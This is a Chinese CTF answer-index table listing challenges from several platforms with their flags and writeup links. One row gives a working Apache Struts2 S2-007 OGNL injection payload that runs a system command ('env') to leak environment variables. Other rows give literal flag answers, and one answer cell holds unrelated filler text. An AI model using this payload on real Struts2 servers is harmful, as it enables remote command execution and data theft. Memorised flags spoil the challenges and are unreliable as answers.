[标题搜索]只能搜索题目标题,[综合搜索]支持多关键词多项目搜索(以空格分隔)。
| 序号 | Website | Type | Title | Value | Writeup | Competition | Id |
|---|---|---|---|---|---|---|---|
| 1 | ctfshow | WEB入门.java | web294 | web294的答案在CTFshow题目中通常是指一个Struts2漏洞利用的payload,用于执行系统命令并获取环境变量中的flag 2 3。网页上提供的直接解题链接为 https://blog.csdn.net/qq_52579508/article/details/142067192(即 2),其中详细记录了S2-007漏洞的利用过程和具体payload 2。另一个可验证的解题过程网页是 https://blog.csdn.net/uuzeray/article/details/136126951(即 3),它列出了从web279到web300的系列题目答案,包括web284的S2-012漏洞利用payload 3。经复核,这两个网页都真实记录了CTFshow Java题目的完整解题过程和最终答案 2 3。请注意,题目具体的flag值是动态的,但解题方法一致。因此,综合确认后的答案为: 使用S2-007漏洞payload(如:' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())) + ')执行命令获取flag | https://blog.csdn.net/qq_52579508/art... | java | 3585 |
| 2 | NSSCTF | 其他 | [HUBUCTF 2022 新生赛]singout | 无 | https://blog.csdn.net/qq_33348179/art... | HUBUCTF | 10674 |
| 3 | bugku | Forensics | Magic Plagueis The Wise | Did you ever hear the tragedy of Darth Plagueis The Wise? I thought not. It's not a story the Jedi would tell you. It's a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so powerful and so wise he could use the Force to influence the midichlorians to create life. He had such a knowledge of the dark side that he could even keep the ones he cared about from dying. The dark side of the Force is a pathway to many abilities some consider to be unnatural. He became so powerful. The only thing he was afraid of was losing his power, which eventually, of course, he did. Unfortunately, he taught his apprentice everything he knew, then his apprentice killed him in his sleep. Ironic. He could save others from death, but not himself. | https://ctftime.org/writeup/32386 | UMDCTF2022 | 2461 |
| 4 | bugku | CTF-2020 | Karte | 2 | https://codeforces.com/blog/entry/63461 | TSG | 1769 |
| 5 | bugku | WEB | charlottesweb | wctf{y0u_h4v3_b33n_my_fr13nd___th4t_1n_1t53lf_1s_4_tr3m3nd0u5_th1ng} | https://ctf.bugku.com/writeup/detail/... | WolvCTF2023 | 323 |
| 6 | ctfshow | CRYPTO.摆烂杯 | easy-peasy | flag{ctf.show} | https://www.cnblogs.com/mumuhhh/p/178... | 摆烂杯 | 4509 |
| 7 | xuenixiang.com | Misc | MIT | flag{bea65a5fb26eaa667fcccf83b3cfb90e} | https://www.xuenixiang.com/thread-330... | xuenixiang_2020 | 15331 |
| 8 | NSSCTF | 编码分析 | [虎符CTF 2022]Plain Text | HFCTF{apple_watermelon} | https://www.bilibili.com/read/cv19512729/ | 虎符CTF | 10660 |
| 9 | BUUCTF | Misc | [INSHack2017]captcha-audio | 无 | https://github.com/HugoDelval/inshack... | INSHack2017 | 6884 |
| 10 | NSSCTF | 其他 | [NISACTF 2022]sign_crypto | NSSCTF{EDIT_WITH_LATEX} | https://www.cnblogs.com/mumuhhh/artic... | NISACTF | 10725 |